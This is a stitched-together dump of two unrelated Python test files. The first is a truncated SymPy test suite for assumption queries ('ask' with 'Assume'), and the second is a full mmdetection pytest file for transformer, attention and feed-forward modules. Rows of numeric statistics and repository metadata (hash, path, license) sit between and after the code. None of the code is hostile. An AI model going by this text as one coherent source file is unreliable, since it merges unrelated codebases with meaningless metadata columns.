assert ask(2*x, Q.integer, Assume(x, Q.real)) == None
assert ask(sqrt(2)*x, Q.integer, Assume(x, Q.integer)) == False
assert ask(x/2, Q.integer, Assume(x, Q.odd)) == False
assert ask(x/2, Q.integer, Assume(x, Q.even)) == True
assert ask(x/3, Q.integer, Assume(x, Q.odd)) == None
assert ask(x/3, Q.integer, Assume(x, Q.even)) == None
def test_negative():
x, y = symbols('xy')
assert ask(x, Q.negative, Assume(x, Q.negative)) == True
assert ask(x, Q.negative, Assume(x, Q.positive)) == False
assert ask(x, Q.negative, Assume(x, Q.real, False)) == False
assert ask(x, Q.negative, Assume(x, Q.prime)) == False
assert ask(x, Q.negative, Assume(x, Q.prime, False)) == None
assert ask(-x, Q.negative, Assume(x, Q.positive)) == True
assert ask(-x, Q.negative, Assume(x, Q.positive, False)) == None
assert ask(-x, Q.negative, Assume(x, Q.negative)) == False
assert ask(-x, Q.negative, Assume(x, Q.positive)) == True
assert ask(x-1, Q.negative, Assume(x, Q.negative)) == True
assert ask(x+y, Q.negative) == None
assert ask(x+y, Q.negative, Assume(x, Q.negative)) == None
assert ask(x+y, Q.negative, Assume(x, Q.negative) &\
Assume(y, Q.negative)) == True
assert ask(x**2, Q.negative) == None
assert ask(x**2, Q.negative, Assume(x, Q.real)) == False
assert ask(x**1.4, Q.negative, Assume(x, Q.real)) == None
assert ask(x*y, Q.negative) == None
assert ask(x*y, Q.negative, Assume(x, Q.positive) & \
Assume(y, Q.positive)) == False
assert ask(x*y, Q.negative, Assume(x, Q.positive) & \
Assume(y, Q.negative)) == True
assert ask(x*y, Q.negative, Assume(x, Q.complex) & \
Assume(y, Q.complex)) == None
assert ask(x**y, Q.negative) == None
assert ask(x**y, Q.negative, Assume(x, Q.negative) & \
Assume(y, Q.even)) == False
assert ask(x**y, Q.negative, Assume(x, Q.negative) & \
Assume(y, Q.odd)) == True
assert ask(x**y, Q.negative, Assume(x, Q.positive) & \
Assume(y, Q.integer)) == False
assert ask(Abs(x), Q.negative) == False
def test_nonzero():
x, y = symbols('xy')
assert ask(x, Q.nonzero) == None
assert ask(x, Q.nonzero, Assume(x, Q.real)) == None
assert ask(x, Q.nonzero, Assume(x, Q.positive)) == True
assert ask(x, Q.nonzero, Assume(x, Q.negative)) == True
assert ask(x, Q.nonzero, Assume(x, Q.negative) | Assume(x, Q.positive)) == True
assert ask(x+y, Q.nonzero) == None
assert ask(x+y, Q.nonzero, Assume(x, Q.positive) & Assume(y, Q.positive)) == True
assert ask(x+y, Q.nonzero, Assume(x, Q.positive) & Assume(y, Q.negative)) == None
assert ask(x+y, Q.nonzero, Assume(x, Q.negative) & Assume(y, Q.negative)) == True
assert ask(2*x, Q.nonzero) == None
assert ask(2*x, Q.nonzero, Assume(x, Q.positive)) == True
assert ask(2*x, Q.nonzero, Assume(x, Q.negative)) == True
assert ask(x*y, Q.nonzero, Assume(x, Q.nonzero)) == None
assert ask(x*y, Q.nonzero, Assume(x, Q.nonzero) & Assume(y, Q.nonzero)) == True
assert ask(Abs(x), Q.nonzero) == None
assert ask(Abs(x), Q.nonzero, Assume(x, Q.nonzero)) == True
def test_odd():
x, y, z, t = symbols('x y z t')
assert ask(x, Q.odd) == None
assert ask(x, Q.odd, Assume(x, Q.odd)) == True
assert ask(x, Q.odd, Assume(x, Q.integer)) == None
assert ask(x, Q.odd, Assume(x, Q.integer, False)) == False
assert ask(x, Q.odd, Assume(x, Q.rational)) == None
assert ask(x, Q.odd, Assume(x, Q.positive)) == None
assert ask(-x, Q.odd, Assume(x, Q.odd)) == True
assert ask(2*x, Q.odd) == None
assert ask(2*x, Q.odd, Assume(x, Q.integer)) == False
assert ask(2*x, Q.odd, Assume(x, Q.odd)) == False
assert ask(2*x, Q.odd, Assume(x, Q.irrational)) == False
assert ask(2*x, Q.odd, Assume(x, Q.integer, False)) == None
assert ask(3*x, Q.odd, Assume(x, Q.integer)) == None
assert ask(x/3, Q.odd, Assume(x, Q.odd)) == None
assert ask(x/3, Q.odd, Assume(x, Q.even)) == None
assert ask(x+1, Q.odd, Assume(x, Q.even)) == True
assert ask(x+2, Q.odd, Assume(x, Q.even)) == False
assert ask(x+2, Q.odd, Assume(x, Q.odd)) == True
assert ask(3-x, Q.odd, Assume(x, Q.odd)) == False
assert ask(3-x, Q.odd, Assume(x, Q.even)) == True
assert ask(3+x, Q.odd, Assume(x, Q.odd)) == False
assert ask(3+x, Q.odd, Assume(x, Q.even)) == True
assert ask(x+y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd)) == False
assert ask(x+y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.even)) == True
assert ask(x-y, Q.odd, Assume(x, Q.even) & Assume(y, Q.odd)) == True
assert ask(x-y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd)) == False
assert ask(x+y+z, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd) & \
Assume(z, Q.even)) == False
assert ask(x+y+z+t, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd) & \
Assume(z, Q.even) & Assume(t, Q.integer)) == None
assert ask(2*x + 1, Q.odd, Assume(x, Q.integer)) == True
assert ask(2*x + y, Q.odd, Assume(x, Q.integer) & Assume(y, Q.odd)) == True
assert ask(2*x + y, Q.odd, Assume(x, Q.integer) & Assume(y, Q.even)) == False
assert ask(2*x + y, Q.odd, Assume(x, Q.integer) & Assume(y, Q.integer)) == None
assert ask(x*y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.even)) == False
assert ask(x*y, Q.odd, Assume(x, Q.odd) & Assume(y, Q.odd)) == True
assert ask(2*x*y, Q.odd, Assume(x, Q.rational) & Assume(x, Q.rational)) == None
assert ask(2*x*y, Q.odd, Assume(x, Q.irrational) & Assume(x, Q.irrational)) == None
assert ask(Abs(x), Q.odd, Assume(x, Q.odd)) == True
def test_prime():
x, y = symbols('x y')
assert ask(x, Q.prime, Assume(x, Q.prime)) == True
assert ask(x, Q.prime, Assume(x, Q.prime, False)) == False
assert ask(x, Q.prime, Assume(x, Q.integer)) == None
assert ask(x, Q.prime, Assume(x, Q.integer, False)) == False
assert ask(2*x, Q.prime, Assume(x, Q.integer)) == False
assert ask(x*y, Q.prime) == None
assert ask(x*y, Q.prime, Assume(x, Q.prime)) == None
assert ask(x*y, Q.prime, Assume(x, Q.integer) & \
Assume(y, Q.integer)) == False
assert ask(x**2, Q.prime, Assume(x, Q.integer)) == False
assert ask(x**2, Q.prime, Assume(x, Q.prime)) == False
assert ask(x**y, Q.prime, Assume(x, Q.integer) & \
Assume(y, Q.integer)) == False
def test_positive():
x, y, z, w = symbols('xyzw')
assert ask(x, Q.positive, Assume(x, Q.positive)) == True
assert ask(x, Q.positive, Assume(x, Q.negative)) == False
assert ask(x, Q.positive, Assume(x, Q.nonzero)) == None
assert ask(-x, Q.positive, Assume(x, Q.positive)) == False
assert ask(-x, Q.positive, Assume(x, Q.negative)) == True
assert ask(x+y, Q.positive, Assume(x, Q.positive) & \
Assume(y, Q.positive)) == True
assert ask(x+y, Q.positive, Assume(x, Q.positive) & \
Assume(y, Q.negative)) == None
assert ask(2*x, Q.positive, Assume(x, Q.positive)) == True
assumptions = Assume(x, Q.positive) & Assume(y, Q.negative) & \
Assume(z, Q.negative) & Assume(w, Q.positive)
assert ask(x*y*z, Q.positive) == None
assert ask(x*y*z, Q.positive, assumptions) == True
assert ask(-x*y*z, Q.positive, assumptions) == False
assert ask(x**2, Q.positive, Assume(x, Q.positive)) == True
assert ask(x**2, Q.positive, Assume(x, Q.negative)) == True
#exponential
assert ask(exp(x), Q.positive, Assume(x, Q.real)) == True
assert ask(x + exp(x), Q.positive, Assume(x, Q.real)) == None
#absolute value
assert ask(Abs(x), Q.positive) == None # Abs(0) = 0
assert ask(Abs(x), Q.positive, Assume(x, Q.positive)) == True
@XFAIL
def test_positive_xfail():
assert ask(1/(1 + x**2), Q.positive, Assume(x, Q.real)) == True
def test_real():
x, y = symbols('x y')
assert ask(x, Q.real) == None
assert ask(x, Q.real, Assume(x, Q.real)) == True
assert ask(x, Q.real, Assume(x, Q.nonzero)) == True
assert ask(x, Q.real, Assume(x, Q.positive)) == True
assert ask(x, Q.real, Assume(x, Q.negative)) == True
assert ask(x, Q.real, Assume(x, Q.integer)) == True
assert ask(x, Q.real, Assume(x, Q.even)) == True
assert ask(x, Q.real, Assume(x, Q.prime)) == True
assert ask(x/sqrt(2), Q.real, Assume(x, Q.real)) == True
assert ask(x/sqrt(-2), Q.real, Assume(x, Q.real)) == False
I = S.ImaginaryUnit
assert ask(x+1, Q.real, Assume(x, Q.real)) == True
assert ask(x+I, Q.real, Assume(x, Q.real)) == False
assert ask(x+I, Q.real, Assume(x, Q.complex)) == None
assert ask(2*x, Q.real, Assume(x, Q.real)) == True
assert ask(I*x, Q.real, Assume(x, Q.real)) == False
assert ask(I*x, Q.real, Assume(x, Q.imaginary)) == True
assert ask(I*x, Q.real, Assume(x, Q.complex)) == None
assert ask(x**2, Q.real, Assume(x, Q.real)) == True
assert ask(sqrt(x), Q.real, Assume(x, Q.negative)) == False
assert ask(x**y, Q.real, Assume(x, Q.real) & Assume(y, Q.integer)) == True
assert ask(x**y, Q.real, Assume(x, Q.real) & Assume(y, Q.real)) == None
assert ask(x**y, Q.real, Assume(x, Q.positive) & \
Assume(y, Q.real)) == True
# trigonometric functions
assert ask(sin(x), Q.real) == None
assert ask(cos(x), Q.real) == None
assert ask(sin(x), Q.real, Assume(x, Q.real)) == True
assert ask(cos(x), Q.real, Assume(x, Q.real)) == True
# exponential function
assert ask(exp(x), Q.real) == None
assert ask(exp(x), Q.real, Assume(x, Q.real)) == True
assert ask(x + exp(x), Q.real, Assume(x, Q.real)) == True
# Q.complexes
assert ask(re(x), Q.real) == True
assert ask(im(x), Q.real) == True
def test_algebraic():
x, y = symbols('x,y')
assert ask(x, 'algebraic') == None
assert ask(I, 'algebraic') == True
assert ask(2*I, 'algebraic') == True
assert ask(I/3, 'algebraic') == True
assert ask(sqrt(7), 'algebraic') == True
assert ask(2*sqrt(7), 'algebraic') == True
assert ask(sqrt(7)/3, 'algebraic') == True
assert ask(I*sqrt(3), 'algebraic') == True
assert ask(sqrt(1+I*sqrt(3)), 'algebraic') == True
assert ask((1+I*sqrt(3)**(S(17)/31)), 'algebraic') == True
assert ask((1+I*sqrt(3)**(S(17)/pi)), 'algebraic') == False
assert ask(sin(7), 'algebraic') == None
assert ask(sqrt(sin(7)), 'algebraic') == None
assert ask(sqrt(y+I*sqrt(7)), 'algebraic') == None
assert ask(oo, 'algebraic') == False
assert ask(-oo, 'algebraic') == False
assert ask(2.47, 'algebraic') == False
def test_global():
"""Test ask with global assumptions"""
x = symbols('x')
assert ask(x, Q.integer) == None
global_assumptions.add(Assume(x, Q.integer))
assert ask(x, Q.integer) == True
global_assumptions.clear()
assert ask(x, Q.integer) == None
def test_custom_context():
"""Test ask with custom assumptions context"""
x = symbols('x')
assert ask(x, Q.integer) == None
local_context = AssumptionsContext()
local_context.add(Assume(x, Q.integer))
assert ask(x, Q.integer, context = local_context) == True
assert ask(x, Q.integer) == None
def test_functions_in_assumptions():
from sympy.logic.boolalg import Equivalent, Xor
x = symbols('x')
assert ask(x, Q.negative, Q.real(x) >> Q.positive(x)) is False
assert ask(x, Q.negative, Equivalent(Q.real(x), Q.positive(x))) is False
assert ask(x, Q.negative, Xor(Q.real(x), Q.negative(x))) is False
def test_is_true():
from sympy.logic.boolalg import Equivalent, Implies
x = symbols('x')
assert ask(True, Q.is_true) is True
assert ask(~Q.negative(x), Q.is_true, Q.positive(x)) is True
assert ask(~Q.real(x), Q.is_true, Q.commutative(x)) is None
assert ask(Q.negative(x) & Q.integer(x), Q.is_true, Q.positive(x)) is False
assert ask(Q.negative(x) & Q.integer(x), Q.is_true) is None
assert ask(Q.real(x) | Q.integer(x), Q.is_true, Q.positive(x)) is True
assert ask(Q.real(x) | Q.integer(x), Q.is_true) is None
assert ask(Q.real(x) >> Q.positive(x), Q.is_true, Q.negative(x)) is False
assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False), Q.is_true,
Q.negative(x)) is False
assert ask(Implies(Q.real(x), Q.positive(x), evaluate=False), Q.is_true) is None
assert ask(Equivalent(Q.integer(x), Q.even(x)), Q.is_true, Q.even(x)) is True
assert ask(Equivalent(Q.integer(x), Q.even(x)), Q.is_true) is None
assert ask(Equivalent(Q.positive(x), Q.integer(x)), Q.is_true, Q.integer(x)) is None
def test_incompatible_resolutors():
x = symbols('x')
class Prime2AskHandler(AskHandler):
@staticmethod
def Number(expr, assumptions):
return True
register_handler('prime', Prime2AskHandler)
raises(ValueError, 'ask(4, Q.prime)')
remove_handler('prime', Prime2AskHandler)
class InconclusiveHandler(AskHandler):
@staticmethod
def Number(expr, assumptions):
return None
register_handler('prime', InconclusiveHandler)
assert ask(3, Q.prime) == True
def test_key_extensibility():
"""test that you can add keys to the ask system at runtime"""
x = Symbol('x')
# make sure thie key is not defined
raises(AttributeError, "ask(x, 'my_key')")
class MyAskHandler(AskHandler):
@staticmethod
def Symbol(expr, assumptions):
return True
register_handler('my_key', MyAskHandler)
assert ask(x, 'my_key') == True
assert ask(x+1, 'my_key') == None
remove_handler('my_key', MyAskHandler)
def test_type_extensibility():
"""test that new types can be added to the ask system at runtime
We create a custom type MyType, and override ask Q.prime=True with handler
MyAskHandler for this type
TODO: test incompatible resolutors
"""
from sympy.core import Basic
class MyType(Basic):
pass
class MyAskHandler(AskHandler):
@staticmethod
def MyType(expr, assumptions):
return True
a = MyType()
register_handler(Q.prime, MyAskHandler)
assert ask(a, Q.prime) == True
| 42.667311
| 88
| 0.570085
| 6,847
| 44,118
| 3.659851
| 0.024828
| 0.252843
| 0.095455
| 0.099206
| 0.905942
| 0.833912
| 0.78802
| 0.748753
| 0.71188
| 0.63119
| 0
| 0.00745
| 0.263702
| 44,118
| 1,033
| 89
| 42.708616
| 0.763976
| 0.017227
| 0
| 0.359679
| 0
| 0
| 0.006445
| 0
| 0
| 0
| 0
| 0.000968
| 0.806415
| 1
| 0.046964
| false
| 0.001145
| 0.009164
| 0.004582
| 0.066438
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7fe24d4776e3f3bbce4174003ef6309ab600bfa7
| 20,396
|
py
|
Python
|
tests/test_models/test_utils/test_transformer.py
|
yypurpose/mmdetection
|
ec6bfd96eae0af047c623f3d1ec31b0b3f1f4a6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_models/test_utils/test_transformer.py
|
yypurpose/mmdetection
|
ec6bfd96eae0af047c623f3d1ec31b0b3f1f4a6c
|
[
"Apache-2.0"
] | null | null | null |
tests/test_models/test_utils/test_transformer.py
|
yypurpose/mmdetection
|
ec6bfd96eae0af047c623f3d1ec31b0b3f1f4a6c
|
[
"Apache-2.0"
] | null | null | null |
from unittest.mock import patch
import pytest
import torch
from mmdet.models.utils import (FFN, MultiheadAttention, Transformer,
TransformerDecoder, TransformerDecoderLayer,
TransformerEncoder, TransformerEncoderLayer)
def _ffn_forward(self, x, residual=None):
if residual is None:
residual = x
residual_str = residual.split('_')[-1]
if '(residual' in residual_str:
residual_str = residual_str.split('(residual')[0]
return x + '_ffn(residual={})'.format(residual_str)
def _multihead_attention_forward(self,
x,
key=None,
value=None,
residual=None,
query_pos=None,
key_pos=None,
attn_mask=None,
key_padding_mask=None,
selfattn=True):
if residual is None:
residual = x
residual_str = residual.split('_')[-1]
if '(residual' in residual_str:
residual_str = residual_str.split('(residual')[0]
attn_str = 'selfattn' if selfattn else 'multiheadattn'
return x + '_{}(residual={})'.format(attn_str, residual_str)
def _encoder_layer_forward(self,
x,
pos=None,
attn_mask=None,
key_padding_mask=None):
norm_cnt = 0
inp_residual = x
for layer in self.order:
if layer == 'selfattn':
x = self.self_attn(
x,
x,
x,
inp_residual if self.pre_norm else None,
query_pos=pos,
attn_mask=attn_mask,
key_padding_mask=key_padding_mask)
inp_residual = x
elif layer == 'norm':
x = x + '_norm{}'.format(norm_cnt)
norm_cnt += 1
elif layer == 'ffn':
x = self.ffn(x, inp_residual if self.pre_norm else None)
else:
raise ValueError(f'Unsupported layer type {layer}.')
return x
def _decoder_layer_forward(self,
x,
memory,
memory_pos=None,
query_pos=None,
memory_attn_mask=None,
target_attn_mask=None,
memory_key_padding_mask=None,
target_key_padding_mask=None):
norm_cnt = 0
inp_residual = x
for layer in self.order:
if layer == 'selfattn':
x = self.self_attn(
x,
x,
x,
inp_residual if self.pre_norm else None,
query_pos,
attn_mask=target_attn_mask,
key_padding_mask=target_key_padding_mask)
inp_residual = x
elif layer == 'norm':
x = x + '_norm{}'.format(norm_cnt)
norm_cnt += 1
elif layer == 'multiheadattn':
x = self.multihead_attn(
x,
memory,
memory,
inp_residual if self.pre_norm else None,
query_pos,
key_pos=memory_pos,
attn_mask=memory_attn_mask,
key_padding_mask=memory_key_padding_mask,
selfattn=False)
inp_residual = x
elif layer == 'ffn':
x = self.ffn(x, inp_residual if self.pre_norm else None)
else:
raise ValueError(f'Unsupported layer type {layer}.')
return x
def test_multihead_attention(embed_dims=8,
num_heads=2,
dropout=0.1,
num_query=5,
num_key=10,
batch_size=1):
module = MultiheadAttention(embed_dims, num_heads, dropout)
# self attention
query = torch.rand(num_query, batch_size, embed_dims)
out = module(query)
assert out.shape == (num_query, batch_size, embed_dims)
# set key
key = torch.rand(num_key, batch_size, embed_dims)
out = module(query, key)
assert out.shape == (num_query, batch_size, embed_dims)
# set residual
residual = torch.rand(num_query, batch_size, embed_dims)
out = module(query, key, key, residual)
assert out.shape == (num_query, batch_size, embed_dims)
# set query_pos and key_pos
query_pos = torch.rand(num_query, batch_size, embed_dims)
key_pos = torch.rand(num_key, batch_size, embed_dims)
out = module(query, key, None, residual, query_pos, key_pos)
assert out.shape == (num_query, batch_size, embed_dims)
# set key_padding_mask
key_padding_mask = torch.rand(batch_size, num_key) > 0.5
out = module(query, key, None, residual, query_pos, key_pos, None,
key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
# set attn_mask
attn_mask = torch.rand(num_query, num_key) > 0.5
out = module(query, key, key, residual, query_pos, key_pos, attn_mask,
key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
def test_ffn(embed_dims=8, feedforward_channels=8, num_fcs=2, batch_size=1):
# test invalid num_fcs
with pytest.raises(AssertionError):
module = FFN(embed_dims, feedforward_channels, 1)
module = FFN(embed_dims, feedforward_channels, num_fcs)
x = torch.rand(batch_size, embed_dims)
out = module(x)
assert out.shape == (batch_size, embed_dims)
# set residual
residual = torch.rand(batch_size, embed_dims)
out = module(x, residual)
assert out.shape == (batch_size, embed_dims)
# test case with no residual
module = FFN(embed_dims, feedforward_channels, num_fcs, add_residual=False)
x = torch.rand(batch_size, embed_dims)
out = module(x)
assert out.shape == (batch_size, embed_dims)
def test_transformer_encoder_layer(embed_dims=8,
num_heads=2,
feedforward_channels=8,
num_key=10,
batch_size=1):
x = torch.rand(num_key, batch_size, embed_dims)
# test invalid number of order
with pytest.raises(AssertionError):
order = ('norm', 'selfattn', 'norm', 'ffn', 'norm')
module = TransformerEncoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
# test invalid value of order
with pytest.raises(AssertionError):
order = ('norm', 'selfattn', 'norm', 'unknown')
module = TransformerEncoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
module = TransformerEncoderLayer(embed_dims, num_heads,
feedforward_channels)
key_padding_mask = torch.rand(batch_size, num_key) > 0.5
out = module(x, key_padding_mask=key_padding_mask)
assert not module.pre_norm
assert out.shape == (num_key, batch_size, embed_dims)
# set pos
pos = torch.rand(num_key, batch_size, embed_dims)
out = module(x, pos, key_padding_mask=key_padding_mask)
assert out.shape == (num_key, batch_size, embed_dims)
# set attn_mask
attn_mask = torch.rand(num_key, num_key) > 0.5
out = module(x, pos, attn_mask, key_padding_mask)
assert out.shape == (num_key, batch_size, embed_dims)
# set pre_norm
order = ('norm', 'selfattn', 'norm', 'ffn')
module = TransformerEncoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
assert module.pre_norm
out = module(x, pos, attn_mask, key_padding_mask)
assert out.shape == (num_key, batch_size, embed_dims)
@patch('mmdet.models.utils.TransformerEncoderLayer.forward',
_encoder_layer_forward)
@patch('mmdet.models.utils.FFN.forward', _ffn_forward)
@patch('mmdet.models.utils.MultiheadAttention.forward',
_multihead_attention_forward)
def test_order():
module = TransformerEncoderLayer(embed_dims, num_heads,
feedforward_channels)
out = module('input')
assert out == 'input_selfattn(residual=input)_norm0_ffn' \
'(residual=norm0)_norm1'
# pre_norm
order = ('norm', 'selfattn', 'norm', 'ffn')
module = TransformerEncoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
out = module('input')
assert out == 'input_norm0_selfattn(residual=input)_' \
'norm1_ffn(residual=selfattn)'
test_order()
def test_transformer_decoder_layer(embed_dims=8,
num_heads=2,
feedforward_channels=8,
num_key=10,
num_query=5,
batch_size=1):
query = torch.rand(num_query, batch_size, embed_dims)
# test invalid number of order
with pytest.raises(AssertionError):
order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn',
'norm')
module = TransformerDecoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
# test invalid value of order
with pytest.raises(AssertionError):
order = ('norm', 'selfattn', 'unknown', 'multiheadattn', 'norm', 'ffn')
module = TransformerDecoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
module = TransformerDecoderLayer(embed_dims, num_heads,
feedforward_channels)
memory = torch.rand(num_key, batch_size, embed_dims)
assert not module.pre_norm
out = module(query, memory)
assert out.shape == (num_query, batch_size, embed_dims)
# set query_pos
query_pos = torch.rand(num_query, batch_size, embed_dims)
out = module(query, memory, memory_pos=None, query_pos=query_pos)
assert out.shape == (num_query, batch_size, embed_dims)
# set memory_pos
memory_pos = torch.rand(num_key, batch_size, embed_dims)
out = module(query, memory, memory_pos, query_pos)
assert out.shape == (num_query, batch_size, embed_dims)
# set memory_key_padding_mask
memory_key_padding_mask = torch.rand(batch_size, num_key) > 0.5
out = module(
query,
memory,
memory_pos,
query_pos,
memory_key_padding_mask=memory_key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
# set target_key_padding_mask
target_key_padding_mask = torch.rand(batch_size, num_query) > 0.5
out = module(
query,
memory,
memory_pos,
query_pos,
memory_key_padding_mask=memory_key_padding_mask,
target_key_padding_mask=target_key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
# set memory_attn_mask
memory_attn_mask = torch.rand(num_query, num_key)
out = module(
query,
memory,
memory_pos,
query_pos,
memory_attn_mask,
memory_key_padding_mask=memory_key_padding_mask,
target_key_padding_mask=target_key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
# set target_attn_mask
target_attn_mask = torch.rand(num_query, num_query)
out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
target_attn_mask, memory_key_padding_mask,
target_key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
# pre_norm
order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn')
module = TransformerDecoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
assert module.pre_norm
out = module(
query,
memory,
memory_pos,
query_pos,
memory_attn_mask,
memory_key_padding_mask=memory_key_padding_mask,
target_key_padding_mask=target_key_padding_mask)
assert out.shape == (num_query, batch_size, embed_dims)
@patch('mmdet.models.utils.TransformerDecoderLayer.forward',
_decoder_layer_forward)
@patch('mmdet.models.utils.FFN.forward', _ffn_forward)
@patch('mmdet.models.utils.MultiheadAttention.forward',
_multihead_attention_forward)
def test_order():
module = TransformerDecoderLayer(embed_dims, num_heads,
feedforward_channels)
out = module('input', 'memory')
assert out == 'input_selfattn(residual=input)_norm0_multiheadattn' \
'(residual=norm0)_norm1_ffn(residual=norm1)_norm2'
# pre_norm
order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn')
module = TransformerDecoderLayer(
embed_dims, num_heads, feedforward_channels, order=order)
out = module('input', 'memory')
assert out == 'input_norm0_selfattn(residual=input)_norm1_' \
'multiheadattn(residual=selfattn)_norm2_ffn(residual=' \
'multiheadattn)'
test_order()
def test_transformer_encoder(num_layers=2,
embed_dims=8,
num_heads=2,
feedforward_channels=8,
num_key=10,
batch_size=1):
module = TransformerEncoder(num_layers, embed_dims, num_heads,
feedforward_channels)
assert not module.pre_norm
assert module.norm is None
x = torch.rand(num_key, batch_size, embed_dims)
out = module(x)
assert out.shape == (num_key, batch_size, embed_dims)
# set pos
pos = torch.rand(num_key, batch_size, embed_dims)
out = module(x, pos)
assert out.shape == (num_key, batch_size, embed_dims)
# set key_padding_mask
key_padding_mask = torch.rand(batch_size, num_key) > 0.5
out = module(x, pos, None, key_padding_mask)
assert out.shape == (num_key, batch_size, embed_dims)
# set attn_mask
attn_mask = torch.rand(num_key, num_key) > 0.5
out = module(x, pos, attn_mask, key_padding_mask)
assert out.shape == (num_key, batch_size, embed_dims)
# pre_norm
order = ('norm', 'selfattn', 'norm', 'ffn')
module = TransformerEncoder(
num_layers, embed_dims, num_heads, feedforward_channels, order=order)
assert module.pre_norm
assert module.norm is not None
out = module(x, pos, attn_mask, key_padding_mask)
assert out.shape == (num_key, batch_size, embed_dims)
def test_transformer_decoder(num_layers=2,
embed_dims=8,
num_heads=2,
feedforward_channels=8,
num_key=10,
num_query=5,
batch_size=1):
module = TransformerDecoder(num_layers, embed_dims, num_heads,
feedforward_channels)
query = torch.rand(num_query, batch_size, embed_dims)
memory = torch.rand(num_key, batch_size, embed_dims)
out = module(query, memory)
assert out.shape == (1, num_query, batch_size, embed_dims)
# set query_pos
query_pos = torch.rand(num_query, batch_size, embed_dims)
out = module(query, memory, query_pos=query_pos)
assert out.shape == (1, num_query, batch_size, embed_dims)
# set memory_pos
memory_pos = torch.rand(num_key, batch_size, embed_dims)
out = module(query, memory, memory_pos, query_pos)
assert out.shape == (1, num_query, batch_size, embed_dims)
# set memory_key_padding_mask
memory_key_padding_mask = torch.rand(batch_size, num_key) > 0.5
out = module(
query,
memory,
memory_pos,
query_pos,
memory_key_padding_mask=memory_key_padding_mask)
assert out.shape == (1, num_query, batch_size, embed_dims)
# set target_key_padding_mask
target_key_padding_mask = torch.rand(batch_size, num_query) > 0.5
out = module(
query,
memory,
memory_pos,
query_pos,
memory_key_padding_mask=memory_key_padding_mask,
target_key_padding_mask=target_key_padding_mask)
assert out.shape == (1, num_query, batch_size, embed_dims)
# set memory_attn_mask
memory_attn_mask = torch.rand(num_query, num_key) > 0.5
out = module(query, memory, memory_pos, query_pos, memory_attn_mask, None,
memory_key_padding_mask, target_key_padding_mask)
assert out.shape == (1, num_query, batch_size, embed_dims)
# set target_attn_mask
target_attn_mask = torch.rand(num_query, num_query) > 0.5
out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
target_attn_mask, memory_key_padding_mask,
target_key_padding_mask)
assert out.shape == (1, num_query, batch_size, embed_dims)
# pre_norm
order = ('norm', 'selfattn', 'norm', 'multiheadattn', 'norm', 'ffn')
module = TransformerDecoder(
num_layers, embed_dims, num_heads, feedforward_channels, order=order)
out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
target_attn_mask, memory_key_padding_mask,
target_key_padding_mask)
assert out.shape == (1, num_query, batch_size, embed_dims)
# return_intermediate
module = TransformerDecoder(
num_layers,
embed_dims,
num_heads,
feedforward_channels,
order=order,
return_intermediate=True)
out = module(query, memory, memory_pos, query_pos, memory_attn_mask,
target_attn_mask, memory_key_padding_mask,
target_key_padding_mask)
assert out.shape == (num_layers, num_query, batch_size, embed_dims)
def test_transformer(num_enc_layers=2,
num_dec_layers=2,
embed_dims=8,
num_heads=2,
num_query=5,
batch_size=1):
module = Transformer(embed_dims, num_heads, num_enc_layers, num_dec_layers)
height, width = 8, 6
x = torch.rand(batch_size, embed_dims, height, width)
mask = torch.rand(batch_size, height, width) > 0.5
query_embed = torch.rand(num_query, embed_dims)
pos_embed = torch.rand(batch_size, embed_dims, height, width)
hs, mem = module(x, mask, query_embed, pos_embed)
assert hs.shape == (1, batch_size, num_query, embed_dims)
assert mem.shape == (batch_size, embed_dims, height, width)
# pre_norm
module = Transformer(
embed_dims, num_heads, num_enc_layers, num_dec_layers, pre_norm=True)
hs, mem = module(x, mask, query_embed, pos_embed)
assert hs.shape == (1, batch_size, num_query, embed_dims)
assert mem.shape == (batch_size, embed_dims, height, width)
# return_intermediate
module = Transformer(
embed_dims,
num_heads,
num_enc_layers,
num_dec_layers,
return_intermediate_dec=True)
hs, mem = module(x, mask, query_embed, pos_embed)
assert hs.shape == (num_dec_layers, batch_size, num_query, embed_dims)
assert mem.shape == (batch_size, embed_dims, height, width)
# pre_norm and return_intermediate
module = Transformer(
embed_dims,
num_heads,
num_enc_layers,
num_dec_layers,
pre_norm=True,
return_intermediate_dec=True)
hs, mem = module(x, mask, query_embed, pos_embed)
assert hs.shape == (num_dec_layers, batch_size, num_query, embed_dims)
assert mem.shape == (batch_size, embed_dims, height, width)
# test init_weights
module.init_weights()
| 38.923664
| 80
| 0.597029
| 2,404
| 20,396
| 4.738353
| 0.046173
| 0.07743
| 0.078659
| 0.096392
| 0.88605
| 0.87139
| 0.858397
| 0.817926
| 0.785532
| 0.737775
| 0
| 0.007597
| 0.315944
| 20,396
| 523
| 81
| 38.998088
| 0.808845
| 0.036674
| 0
| 0.731884
| 0
| 0
| 0.058534
| 0.02987
| 0
| 0
| 0
| 0
| 0.144928
| 1
